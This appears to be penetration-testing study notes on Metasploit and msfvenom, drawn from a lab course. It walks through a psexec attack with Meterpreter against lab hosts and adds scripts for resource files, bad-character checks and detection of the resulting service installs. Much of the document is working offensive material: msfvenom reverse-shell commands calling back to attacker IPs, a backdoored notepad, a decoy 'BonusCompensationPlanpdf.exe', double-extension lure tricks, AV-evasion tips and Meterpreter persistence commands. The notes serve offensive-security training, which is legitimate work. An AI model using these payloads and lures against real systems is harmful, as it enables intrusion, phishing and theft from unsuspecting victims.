Payloads
Overview
Metasploit is an automated attack framework developed by Rapid7 that streamlines the process of exploiting vulnerabilities through the use of pre-built modules. It contains easy-to-use options to exploit vulnerabilities and deliver payloads to gain a shell on a vulnerable system.
Important Considerations
Training vs. Real-World Usage:
Some cybersecurity training vendors limit Metasploit usage on lab exams
Most organizations will not limit tool usage on engagements
Understanding what a tool actually does on the target is crucial to avoid damaging production systems in live tests
Responsibility lies with the tester to understand tools, techniques, and methodologies
Metasploit Editions:
Community Edition: Free version used in this documentation
Metasploit Pro: Paid edition used by established cybersecurity firms
Metasploit Pro includes additional features for penetration tests, security audits, and social engineering campaigns
Starting Metasploit
Launch Metasploit Framework Console
sudo msfconsole
Expected Output:
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.0.44-dev ]
+ -- --=[ 2131 exploits - 1139 auxiliary - 363 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Writing a custom module? After editing your
module, why not try the reload command
msf6 >
Key Statistics
2131 exploits: Pre-built vulnerability exploits
592 payloads: Available payload options
1139 auxiliary: Supporting modules for scanning/enumeration
363 post: Post-exploitation modules
45 encoders: Payload encoding options
10 nops: No-operation modules
8 evasion: Evasion techniques
Note: These numbers may change as maintainers add/remove modules
Practical Example: SMB Exploitation
Step 1: Target Enumeration
Nmap Scan:
nmap -sC -sV -Pn 10.129.164.25
Sample Output:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 21:03 UTC
Nmap scan report for 10.129.164.25
Host is up (0.020s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Host script results:
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:04:e2 (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-09T21:03:31
|_ start_date: N/A
Key Findings:
SMB service on port 445 (the attack vector used below)
Windows 7-10 system, so a Windows SMB module is needed; with valid credentials, exploit/windows/smb/psexec gives code execution without relying on any vulnerability
SMB1 message signing disabled and SMB2 signing "enabled but not required" (a relay-style weakness, and no obstacle to an authenticated psexec-style logon)
Step 2: Module Search
Search for SMB modules:
msf6 > search smb
Sample Output:
Matching Modules
================
# Name Disclosure Date Rank Check Description
--- ---- --------------- ---- ----- -----------
41 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
42 auxiliary/dos/windows/smb/ms05_047_pnp normal No Microsoft Plug and Play Service Registry Overflow
56 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
60 exploit/windows/smb/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution
Step 3: Understanding Module Structure
Module: exploit/windows/smb/psexec
56 - Module number (index within these search results; it changes between searches, so prefer the full module path in scripts)
exploit/ - Module type (exploit module)
windows/ - Target platform (Windows)
smb/ - Service/protocol (SMB)
psexec - Tool/technique (psexec-style remote service execution over SMB; this module needs valid credentials rather than a vulnerability)
Step 4: Module Selection
msf6 > use 56
Expected Response:
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) >
Prompt Breakdown:
exploit - Module type
windows/smb/psexec - Specific exploit path
Default payload: windows/meterpreter/reverse_tcp
Step 5: Examining Module Options
msf6 exploit(windows/smb/psexec) > options
Module Options:
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload Options:
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 68.183.42.102 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Step 6: Configuring the Exploit
Required Settings:
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.180.71
RHOSTS => 10.129.180.71
msf6 exploit(windows/smb/psexec) > set SHARE ADMIN$
SHARE => ADMIN$
msf6 exploit(windows/smb/psexec) > set SMBPass HTB_@cademy_stdnt!
SMBPass => HTB_@cademy_stdnt!
msf6 exploit(windows/smb/psexec) > set SMBUser htb-student
SMBUser => htb-student
msf6 exploit(windows/smb/psexec) > set LHOST 10.10.14.222
LHOST => 10.10.14.222
Configuration Breakdown:
RHOSTS: Target IP address(es)
SHARE: Administrative share (ADMIN$, C$, etc.)
SMBPass: Password for authentication
SMBUser: Username for authentication
LHOST: Local host IP for reverse connection
Step 7: Executing the Exploit
msf6 exploit(windows/smb/psexec) > exploit
Execution Output:
[*] Started reverse TCP handler on 10.10.14.222:4444
[*] 10.129.180.71:445 - Connecting to the server...
[*] 10.129.180.71:445 - Authenticating to 10.129.180.71:445 as user 'htb-student'...
[*] 10.129.180.71:445 - Selecting PowerShell target
[*] 10.129.180.71:445 - Executing the payload...
[+] 10.129.180.71:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 10.129.180.71
[*] Meterpreter session 1 opened (10.10.14.222:4444 -> 10.129.180.71:49675) at 2021-09-13 17:43:41 +0000
meterpreter >
Process Breakdown:
Handler Started: Reverse TCP handler listening on LHOST:LPORT
Connection: Connecting to target SMB service
Authentication: Authenticating with provided credentials
Target Selection: Selecting PowerShell target
Payload Execution: Executing the payload on target
Stage Transfer: Sending Meterpreter stage to target
Session Establishment: Meterpreter session opened
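The seven steps above, replayed as a resource script so the run is repeatable and the settings can be reviewed before anything touches the target. This is an added example, not code from the original page or from Metasploit: it prints an msfconsole .rc file from the lab values used above (the addresses, the htb-student credentials and the ADMIN$ share are the walkthrough's; the 4444 and SMBDomain defaults are this script's own), and nothing is executed until you hand the file to msfconsole -r.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): turn Steps 4-7 into an
# msfconsole resource script. Values shown in comments are the lab ones
# from the walkthrough; the LPORT/SMBDomain defaults are assumptions here.

# make_psexec_rc RHOSTS SMBUSER SMBPASS LHOST [LPORT] [SMBDOMAIN]
# Prints the resource script on stdout; nothing is executed by this function.
make_psexec_rc() {
  if [ "$#" -lt 4 ]; then
    echo "usage: make_psexec_rc RHOSTS SMBUSER SMBPASS LHOST [LPORT] [SMBDOMAIN]" >&2
    return 2
  fi
  local rhosts="$1" user="$2" pass="$3" lhost="$4"
  local lport="${5:-4444}" domain="${6:-.}"
  cat <<EOF
use exploit/windows/smb/psexec
set RHOSTS ${rhosts}
set RPORT 445
set SHARE ADMIN\$
set SMBDomain ${domain}
set SMBUser ${user}
set SMBPass ${pass}
set payload windows/meterpreter/reverse_tcp
set LHOST ${lhost}
set LPORT ${lport}
show options
# -j: run as a background job, -z: do not drop into the session automatically
exploit -j -z
EOF
}

# Stand-alone use (lab values from the walkthrough above):
#   ./psexec_rc.sh 10.129.180.71 htb-student 'HTB_@cademy_stdnt!' 10.10.14.222 > psexec.rc
#   msfconsole -q -r psexec.rc
# then inside msfconsole: sessions -l / sessions -i 1
if [ "$#" -ge 4 ]; then
  make_psexec_rc "$@"
fi
```

Keeping the credentials in a file you pass with -r (rather than typing them at the prompt) also keeps them out of your shell history, and the show options line lets you eyeball RHOSTS before the exploit line fires.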
Understanding Meterpreter
What is Meterpreter?
Meterpreter is an advanced payload that:
Is delivered by in-memory DLL injection (reflective loading), so the payload itself is never written to disk as a file
Talks to the handler over a single multiplexed TLV channel (encrypted in current versions), so the listener must be Metasploit's multi/handler, not netcat
Provides extensive post-exploitation capabilities through loadable extensions
Leaves fewer file-system artifacts than a dropped executable, but is not invisible: the injection, the stage download and default handler traffic are all well known to AV/EDR
Key Capabilities
File Operations:
Upload/download files
File system navigation
File manipulation
System Operations:
Execute system commands
Run keylogger
Create/start/stop services
Manage processes
Network Operations:
Port forwarding
Network pivoting
Route manipulation
Advanced Features:
Screenshot capture
Webcam access
Audio recording
Registry manipulation
Meterpreter Commands
Get Help:
meterpreter > ?
Common Commands:
# System Information
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
# File System
meterpreter > pwd
meterpreter > ls
meterpreter > cd <directory>
# Process Management
meterpreter > ps
meterpreter > migrate <pid>
# Network
meterpreter > ipconfig
meterpreter > route
# Persistence (legacy Meterpreter script, deprecated in current releases in favour of the post/windows/manage and exploit/windows/local persistence modules)
meterpreter > run persistence -X
Dropping to System Shell
Access Full System Commands:
meterpreter > shell
Process 604 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18362.1256]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>
Return to Meterpreter:
C:\WINDOWS\system32> exit
meterpreter >
Metasploit Module Types
1. Exploit Modules
Purpose: Exploit specific vulnerabilities (or, like psexec, abuse legitimate functionality with valid credentials)
Example: exploit/windows/smb/psexec
Usage: Gain initial access to systems
2. Auxiliary Modules
Purpose: Scanning, enumeration, and verification
Example: auxiliary/scanner/smb/smb_version
Usage: Information gathering and reconnaissance
3. Post Modules
Purpose: Post-exploitation activities
Example: post/windows/gather/credentials/credential_collector
Usage: After gaining access, collect information
4. Payload Modules
Purpose: Code executed on target after exploitation
Example: windows/meterpreter/reverse_tcp
Usage: Establish communication channel
5. Encoder Modules
Purpose: Transform payload bytes so they avoid characters an exploit cannot deliver (null bytes, newlines) and decode themselves at runtime
Example: x86/shikata_ga_nai
Usage: Bad-character avoidance; as an antivirus measure they are of little value, since the decoder stubs are signatured and the decoded payload is visible in memory
6. NOP Modules
Purpose: No-operation instructions for buffer alignment (NOP sleds)
Example: x86/opty2
Usage: Ensure payload stability when the exact landing address is uncertain
MSFVenom - Standalone Payload Generator
Basic Usage
Generate Windows Reverse Shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -f exe -o shell.exe
Generate Linux Reverse Shell:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -f elf -o shell.elf
Generate PHP Web Shell:
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -f raw -o shell.php
All three are staged Meterpreter payloads, so the listener must be exploit/multi/handler with the same payload, LHOST and LPORT set; a netcat listener will not complete the session.
Common Parameters
-p - Payload type (e.g. windows/meterpreter/reverse_tcp)
-f - Output format (e.g. exe, elf, raw, python)
-o - Output file (e.g. shell.exe)
-e - Encoder (e.g. x86/shikata_ga_nai)
-i - Encoding iterations (e.g. 3)
-b - Bad characters the encoder must avoid (e.g. \x00\x0a\x0d)
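Two checks a practitioner runs on a generated artifact before delivery, covering the -b parameter listed above and the "Verification Methods" advice later on this page (file type and bad bytes). This is an added example, not the page's or Metasploit's code: the two hex strings are constructed and are not real shellcode, and the function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: sanity checks for a generated
# payload. hex_kind identifies the container from its magic bytes (the quick
# version of `file`); find_badchars scans a hex dump for bytes the target
# context cannot accept, which is what -b asks the encoder to avoid.
# Both sample hex strings below are constructed, not real shellcode.

# file_hex FILE -> the file as one lowercase hex string (same shape as msfvenom -f hex)
file_hex() { od -An -v -tx1 "$1" | tr -d ' \n'; }

# hex_kind HEX -> pe | elf | unknown, from the leading magic bytes
hex_kind() {
  case "$1" in
    4d5a*)     echo pe ;;       # "MZ"
    7f454c46*) echo elf ;;      # "\x7fELF"
    *)         echo unknown ;;
  esac
}

# find_badchars HEX "00 0a 0d" -> prints "offset=N byte=XX" per hit; returns 1 if any hit
find_badchars() {
  local hex bad="$2" i=0 hits=0 byte b
  hex=$(printf '%s' "$1" | tr 'A-F' 'a-f')
  if [ $(( ${#hex} % 2 )) -ne 0 ]; then
    echo "find_badchars: odd-length hex string" >&2
    return 2
  fi
  while [ -n "$hex" ]; do
    byte=${hex%"${hex#??}"}        # first two hex digits
    hex=${hex#??}                  # drop them
    for b in $bad; do
      if [ "$byte" = "$b" ]; then
        printf 'offset=%d byte=%s\n' "$i" "$byte"
        hits=$((hits + 1))
      fi
    done
    i=$((i + 1))
  done
  [ "$hits" -eq 0 ]
}

# Constructed samples: the first has three null bytes at offsets 7-9, the second is clean.
SAMPLE_WITH_NULLS="fc4883e4f0e8c0000000415141505251564831d2"
SAMPLE_CLEAN="31c050682f2f7368682f62696e89e3"

# Stand-alone demo. Real use: find_badchars "$(msfvenom -p ... -b '\x00' -f hex)" "00"
# Scan the raw shellcode (-f hex), never the finished .exe/.elf: their headers
# contain nulls by design, so -b is meaningless for a standalone executable.
hex_kind 4d5a90000300000004000000ffff0000
find_badchars "$SAMPLE_WITH_NULLS" "00 0a 0d" || echo "bad characters present"
find_badchars "$SAMPLE_CLEAN" "00 0a 0d" && echo "clean"
```

Run find_badchars over the -f hex output of the same msfvenom command you intend to ship; if it reports offsets, the encoder did not (or could not) honour your -b list, and the payload will be truncated or corrupted once it passes through the vulnerable string-handling path.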
Advanced MSFVenom Examples
Encoded Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o encoded_shell.exe
Custom Template (-x embeds the payload in an existing executable; without -k the result only runs the payload, with -k the original program keeps running in a separate thread):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -x notepad.exe -f exe -o backdoored_notepad.exe
Best Practices
1. Reconnaissance First
Always perform thorough enumeration
Identify target OS and services
Understand network topology
Gather credentials when possible
2. Module Selection
Choose appropriate exploit for target
Consider payload options
Understand module limitations
Test in lab environment first
3. Payload Considerations
Select appropriate payload type
Consider network restrictions
Plan for persistence needs
Understand detection risks
4. Operational Security
Use common ports when possible
Do not rely on encoding for AV evasion: stock encoders and unmodified Meterpreter are well signatured, so test the artifact against the target's AV in a lab first
Clean up artifacts after testing
Document all actions taken
5. Session Management
Migrate to stable processes
Create multiple access points
Use appropriate persistence methods
Monitor for detection
Troubleshooting
Common Issues
1. Module Not Found:
msf6 > reload_all
(updatedb refreshes the locate(1) index and is not a Metasploit command; run it from a shell if you want locate to find module files on disk. If the module is missing from the framework itself, update the package, e.g. msfupdate or apt on Kali.)
2. Payload Mismatch:
msf6 exploit(windows/smb/psexec) > show payloads
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
(a bind payload makes the target listen, so it only helps when you can reach the target's port directly and outbound connections from it are blocked)
3. Connection Issues:
# Check firewall rules
# Verify network connectivity
# Confirm correct IP addresses
4. Authentication Failures:
# Verify credentials
# Check domain settings
# Try different authentication methods
Debugging Commands
Show Module Information:
msf6 > info exploit/windows/smb/psexec
Check Payload Options:
msf6 exploit(windows/smb/psexec) > show options
msf6 exploit(windows/smb/psexec) > show payloads
Session Management:
msf6 > sessions -l
msf6 > sessions -i 1
msf6 > sessions -k 1
Security Considerations
Detection Risks
Network Level:
Unusual network connections
Known malicious signatures
Behavioral analysis triggers
Host Level:
Process injection detection
In-memory payload signatures
Behavioral monitoring alerts
Mitigation Strategies
For Penetration Testers:
Use custom or non-default payloads and handlers (the default Meterpreter stage, port 4444 and stock encoders are all signatured)
Treat encoding as bad-character handling, not as evasion; it does not defeat modern AV on its own
Time attacks appropriately
Clean up after testing
For Defenders:
Monitor for known signatures
Implement behavioral analysis
Use application whitelisting
Regular security updates
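A detection-side counterpart to the psexec run above. This is an added example, not from the page and not a vendor rule: it scans Windows System-log "service installed" events (ID 7045) for the two artifacts Metasploit's psexec leaves, a randomly named service whose binary sits in ADMIN$ (native target) or whose image is a hidden, Base64-encoded PowerShell command line (the "PowerShell target" selected in Step 7). The record format, the log lines and the heuristic thresholds are constructed for the example.

```shell
#!/usr/bin/env bash
# Added example for the host-level detection points above; not from the page.
# Metasploit's psexec installs a Windows service on the target. The PowerShell
# target registers a hidden, encoded PowerShell command as the service image;
# the native target drops a randomly named .exe into ADMIN$. Both produce a
# System log event 7045 ("A service was installed in the system").
# Heuristics and sample records are this example's own (constructed).
# Record format assumed: time|host|event_id|service_name|image_path|account

# Prints the constructed sample; the last two records are benign.
sample_7045_log() {
  cat <<'EOF'
2021-09-13T17:43:40Z|WS01|7045|LpqXbTrkaAvZmHgE|%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkA|LocalSystem
2021-09-13T11:20:44Z|FS02|7045|hwaqjsnT|\\FS02\ADMIN$\hwaqjsnT.exe|LocalSystem
2021-09-13T09:12:01Z|WS01|7045|Sysmon64|C:\Windows\Sysmon64.exe|LocalSystem
2021-09-13T09:15:30Z|FS02|7036|Spooler|C:\Windows\System32\spoolsv.exe|LocalSystem
EOF
}

# Reads records on stdin, prints one ALERT line per suspicious 7045 event.
flag_psexec_services() {
  awk -F'|' '
    $3 != "7045" { next }
    {
      name = $4; path = $5; lp = tolower(path); reason = ""
      # all-alphabetic random name of 8-16 chars and a binary dropped into ADMIN$
      if (name ~ /^[A-Za-z]+$/ && length(name) >= 8 && length(name) <= 16 &&
          path ~ /ADMIN[$]\\[A-Za-z]+\.exe$/)
        reason = "random service name, binary in ADMIN$"
      # service whose image is a hidden, encoded PowerShell command line
      else if (lp ~ /powershell/ && lp ~ /-nop/ && lp ~ /-w +hidden/ && lp ~ / -e[a-z]* /)
        reason = "hidden encoded PowerShell service"
      if (reason != "")
        printf "ALERT %s %s svc=%s (%s)\n", $1, $2, name, reason
    }'
}

# Stand-alone run: feed real exported 7045 records in the same pipe-delimited shape.
sample_7045_log | flag_psexec_services
```

The "Service start timed out" line in the exploit output above is the other half of this artifact: the service image is a one-shot command rather than a real service binary, so the Service Control Manager logs a 7009/7000 failure shortly after the 7045, which is a useful second signal to correlate on.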
Summary
Metasploit provides a powerful framework for:
Automated exploitation of known vulnerabilities
Payload delivery through various attack vectors
Post-exploitation activities and persistence
Comprehensive testing of security controls
Key takeaways:
Understand tools before using them
Proper enumeration guides module selection
Meterpreter provides extensive post-exploitation capabilities
Always consider detection and mitigation strategies
Practice in controlled environments first
The combination of Metasploit's exploit modules and payload delivery system makes it an invaluable tool for security professionals, but it requires proper understanding and responsible use to avoid unintended consequences in production environments.
Crafting Payloads with MSFvenom
Understanding Payload Delivery Challenges
Using automated attacks in Metasploit requires network access to vulnerable target machines. However, there are situations where we lack direct network access to a target. In these cases, we need alternative delivery methods such as:
Email attachments with malicious payloads
Social engineering to drive user execution
Physical access via USB drives during onsite tests
Web downloads from compromised or controlled sites
MSFvenom addresses these challenges by providing:
Flexible delivery options for various scenarios
Encoding (-e) and shellcode encryption (--encrypt) options, though neither is a reliable antivirus bypass on its own
Multiple output formats for different platforms
Standalone payload generation without full Metasploit
Exploring Available Payloads
List all available payloads:
msfvenom -l payloads
Sample Output:
Framework Payloads (592 total) [--payload <value>]
==================================================
Name Description
---- -----------
linux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/zarch/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
windows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection (Windows x86)
windows/dllinject/reverse_tcp Inject a DLL via a reflective loader. Connect back to the attacker
nodejs/shell_bind_tcp Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp Creates an interactive shell via nodejs
Staged vs. Stageless Payloads
Staged Payloads
Characteristics:
Create a way to send more components of the attack
"Setting the stage" for additional functionality
Send a small initial stage (the stager), which downloads the remainder (the stage) over the network
Requires multiple network communications
The stager can only connect and fetch, so the listener must be Metasploit's exploit/multi/handler, which serves the stage; a plain netcat listener accepts the connection but has nothing to send, and the session never completes
Example: linux/x86/shell/reverse_tcp
Initial stage executed on target
Calls back to attack box for remainder
Downloads and executes shellcode
Establishes reverse shell connection
Advantages:
Smaller initial payload size
Can deliver larger, more complex payloads
Flexibility in payload composition
Disadvantages:
Multiple network communications required
Dependent on network stability
Takes up memory space for stages
More detectable due to network traffic
Stageless Payloads
Characteristics:
Complete payload sent in its entirety
No additional network communications required
Self-contained executable code
Single network transmission
Example: linux/zarch/meterpreter_reverse_tcp
Complete payload in one transmission
No additional downloads required
Runs as soon as the file executes; nothing further is downloaded, so a plain listener such as netcat is enough for a shell payload (a stageless Meterpreter still needs multi/handler, because netcat cannot speak its protocol)
Advantages:
Better for bandwidth-limited environments
Reduced network traffic (better evasion)
No dependency on network stability
Faster execution
Disadvantages:
Larger payload size
Limited by single transmission constraints
Less flexibility in payload composition
Identifying Staged vs. Stageless Payloads
Naming Convention Rules
Staged Payloads:
The stage and the stager are separate path components, written <stage>/<stager>. Example: linux/x86/shell/reverse_tcp, where shell/ is the stage that will be sent and reverse_tcp is the stager that fetches it. (The leading linux/x86/ components are platform and architecture, not stages.)
Stageless Payloads:
Stage and transport are joined by an underscore in a single final component. Example: linux/zarch/meterpreter_reverse_tcp, where meterpreter_reverse_tcp is the complete payload.
Comparison Examples
windows/meterpreter/reverse_tcp (staged) vs windows/meterpreter_reverse_tcp (stageless)
linux/x86/shell/reverse_tcp (staged) vs linux/x86/shell_reverse_tcp (stageless)
windows/shell/bind_tcp (staged) vs windows/shell_bind_tcp (stageless)
Building Stageless Payloads
Linux ELF Payload Example
Command:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
Output:
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Command Breakdown:
msfvenom - Tool used to create the payload
-p - Selects the payload
linux/x64/shell_reverse_tcp - Linux 64-bit stageless reverse shell
LHOST=10.10.14.113 - IP address to connect back to
LPORT=443 - Port to connect back to
-f elf - Output format (ELF binary)
> createbackup.elf - Output filename (shell redirection; -o createbackup.elf is equivalent)
Windows EXE Payload Example
Command:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
Output:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Payload Delivery Methods
1. Email Attachments
Advantages:
Direct user interaction
Can target specific individuals
Bypasses network perimeter controls
Considerations:
Email security filters
User awareness training
Antivirus scanning
2. Web Downloads
Advantages:
Wide distribution potential
Can be combined with social engineering
Multiple delivery vectors
Considerations:
Web application firewalls
Browser security features
User download behavior
3. Physical Media
Advantages:
Bypasses network controls
High success rate if executed
Direct access to target environment
Considerations:
Physical security controls
Autorun policies
User education
4. Combined with Exploits
Advantages:
Automated delivery
Leverages existing vulnerabilities
Part of broader attack chain
Considerations:
Requires network access
Depends on vulnerability existence
May be detected by security tools
Executing Payloads
Linux Payload Execution
Setup listener (the payload is a stageless plain shell, so netcat is enough; on the target the ELF must first be made executable with chmod +x createbackup.elf):
sudo nc -lvnp 443
When payload executes:
sudo nc -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.129.138.85 60892
env
PWD=/home/htb-student/Downloads
cd ..
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
Windows Payload Execution
Setup listener:
sudo nc -lvnp 443
When payload executes:
sudo nc -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.129.144.5 49679
Microsoft Windows [Version 10.0.18362.1256]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\htb-student\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is DD25-26EB
Directory of C:\Users\htb-student\Downloads
09/23/2021 10:26 AM <DIR> .
09/23/2021 10:26 AM <DIR> ..
09/23/2021 10:26 AM 73,802 BonusCompensationPlanpdf.exe
1 File(s) 73,802 bytes
2 Dir(s) 9,997,516,800 bytes free
Advanced MSFvenom Techniques
Multiple Format Support
Common formats (msfvenom --list formats shows the full set; "executable" formats produce a runnable artifact, "transform" formats print the raw shellcode as a source-code literal for embedding in your own loader):
# Windows executable formats
-f exe # Windows executable
-f dll # Windows DLL
-f msi # Windows installer
-f aspx # ASP.NET page
-f aspx-exe # ASP.NET page wrapping an executable
# Linux executable formats
-f elf # Linux executable
-f elf-so # Linux shared object
# Java formats
-f jar # Java archive
-f war # Web application archive
# Transform formats (shellcode as a literal, not a standalone script)
-f python # Python byte string
-f powershell # PowerShell byte array
-f bash # Bash string
Encoding for Evasion
Basic encoding:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -e x86/shikata_ga_nai -f exe > encoded_payload.exe
Multiple encoding iterations:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -e x86/shikata_ga_nai -i 3 -f exe > multi_encoded.exe
Template Injection
Inject into existing executable:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -x notepad.exe -f exe > backdoored_notepad.exe
Bad Character Removal
Tell the encoder which bytes must not appear in the output. This matters when the shellcode is embedded in an exploit where, for example, a null byte would terminate the string; for a standalone .exe it changes nothing useful, since the PE headers contain nulls anyway:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -b '\x00\x0a\x0d' -f exe > clean_payload.exe
Platform-Specific Considerations
Windows Considerations
Antivirus Evasion:
Use encoders and encryption
Template injection techniques
Fileless payload delivery
Process hollowing techniques
Execution Methods:
Double-click execution
Command line execution
Scheduled tasks
Service installation
Linux Considerations
Permission Requirements:
Executable permissions needed
User context considerations
Privilege escalation needs
Execution Methods:
Direct execution
Bash/shell execution
Cron job scheduling
Service daemon installation
Social Engineering Integration
Filename Strategies
Convincing Filenames:
BonusCompensationPlan.pdf.exe
SecurityUpdate.exe
InstallationWizard.exe
DocumentViewer.exe
File Extension Manipulation:
Use double extensions
Hide real extension
Use similar-looking extensions
Leverage file association weaknesses
Delivery Context
Business Context:
Quarterly reports
Security updates
Software installations
Training materials
Personal Context:
Photos/videos
Games/entertainment
Personal documents
Utilities/tools
Detection and Countermeasures
Common Detection Methods
Signature-based Detection:
Known payload and encoder decoder-stub signatures (the stock msfvenom templates and shikata_ga_nai stubs are widely signatured)
Static heuristics over the file itself
Behavioral Analysis:
Network communication patterns
Process execution behavior
File system modifications
Evasion Techniques
Payload Modification:
Custom encoding schemes
Polymorphic payloads
Encrypted communications
Delayed execution
Delivery Modification:
Staged delivery
Legitimate application abuse
Living-off-the-land techniques
Memory-only execution
MSFvenom Best Practices
Payload Selection
Choose appropriate payload type (staged vs stageless)
Consider target platform and architecture
Evaluate network restrictions and firewall rules
Plan for persistence and post-exploitation needs
Delivery Planning
Understand target environment and security controls
Plan social engineering context and delivery method
Prepare backup delivery methods in case of failure
Consider detection timing and operational security
Operational Security
Use ports the target network already allows outbound (443 in the examples above) so the reverse connection passes egress filtering
Do not rely on encoding for AV evasion; test the artifact against the target's AV product in a lab first
Clean up artifacts after successful execution
Monitor for detection and adjust accordingly
Troubleshooting MSFvenom
Common Issues
Payload Size Limitations:
# msfvenom prints "Payload size: N bytes" on every build; --smallest tries every encoder and keeps the shortest result
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 --smallest
Architecture Mismatches:
# Specify architecture explicitly
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > payload64.exe
Encoding Failures:
# Try different encoders
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -e x86/alpha_mixed -f exe > alpha_encoded.exe
Verification Methods
Test payload functionality:
# Check payload structure
file payload.exe
strings payload.exe
# Test in isolated environment
# Verify listener connectivity
# Confirm execution behavior
Integration with Other Tools
Combining with Social Engineering
Social Engineering Toolkit (SET):
Automated payload delivery
Credential harvesting
Phishing campaigns
Custom Scripts:
Automated payload generation
Batch processing
Custom encoding schemes
Post-Exploitation Integration
Meterpreter Migration:
# After payload execution
meterpreter > ps
meterpreter > migrate <stable_process_pid>
Persistence Establishment:
# Create persistent access (legacy Meterpreter script; deprecated in current releases, use the post/windows/manage or exploit/windows/local persistence modules instead)
meterpreter > run persistence -X -i 10 -p 443 -r 10.10.14.113
This coverage of MSFvenom payload crafting provides the foundation for understanding both the technical aspects and practical applications of standalone payload generation in penetration testing scenarios.
Advanced Meterpreter Techniques
For detailed post-exploitation techniques, advanced commands, and comprehensive Meterpreter usage, see the dedicated Meterpreter Post-Exploitation Guide.